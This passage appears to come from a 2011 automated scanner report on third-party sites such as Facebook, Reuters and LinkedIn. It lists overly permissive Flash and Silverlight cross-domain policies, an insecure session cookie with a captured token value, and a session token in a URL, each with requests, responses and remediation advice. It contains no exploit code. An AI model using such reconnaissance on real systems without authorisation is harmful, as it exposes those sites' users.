Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

6.59. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.155.33
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.60. http://www.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:22 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.61. http://www.reuters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:52:47 GMT
browser-expires: Sun, 4 Sep 2011 00:47:47 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 857
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.reutersmedia.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.62. http://www.sacbee.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Server: Apache/1.3.41
Content-Type: application/xml
Cache-Control: max-age=154
Date: Sun, 04 Sep 2011 00:58:05 GMT
Content-Length: 373
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.63. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 00:55:45 GMT
Expires: Sun, 04 Sep 2011 00:55:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.64. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:16:53 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.65. http://sales.reuters.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sales.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 05 Oct 2009 20:10:04 GMT
ETag: "176c414-1aa-47535b304df00"
Accept-Ranges: bytes
Content-Length: 426
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="sales.reuters.com" />
   <allow-access-from domain="in.sales.reuters.com" />
   <allow-access-from domain="cn.sales.reuters.com" />
...[SNIP]...

7. Silverlight cross-domain policy
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.2. http://content.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

7.3. http://metrics.sprint.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://nmsacramento.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
xserver: www597
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

7.6. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:00:20 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 3106
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:36 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:36 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.8. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www46
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://wa.proflowers.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www381
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. SSL cookie without secure flag set

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

9. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df42349018%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322bc3668%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda0aaa7%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a882414%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cc7f5dc%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

10. SSL certificate
There are 4 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
10.1. https://sprintlb.ehosts.net/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://sprintlb.ehosts.net
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate: The server presented the following certificates:

Server certificate

Issued to:  *.ehosts.net
Issued by:  DigiCert High Assurance CA-3
Valid from:  Fri Nov 19 18:00:00 GMT-06:00 2010
Valid to:  Tue Jan 22 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

10.2. https://socialize.gigya.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.gigya.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Nov 04 09:50:30 GMT-06:00 2010
Valid to:  Sun Nov 04 09:50:30 GMT-06:00 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Thu Jun 29 11:06:20 GMT-06:00 2034

10.3. https://www.linkedin.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.linkedin.com
Issued by:  Thawte SGC CA - G2
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SGC CA - G2
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Wed Jul 28 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 28 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

10.4. https://www.sprint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.sprint.net
Issued by:  Entrust Certification Authority - L1B
Valid from:  Mon May 18 12:20:39 GMT-06:00 2009
Valid to:  Tue Jun 05 12:50:38 GMT-06:00 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1B
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Mon Aug 25 12:14:26 GMT-06:00 2008
Valid to:  Sat Aug 25 12:44:26 GMT-06:00 2018

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:  Tue Jul 24 08:15:12 GMT-06:00 2029

11. Cookie scoped to parent domain
There are 72 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

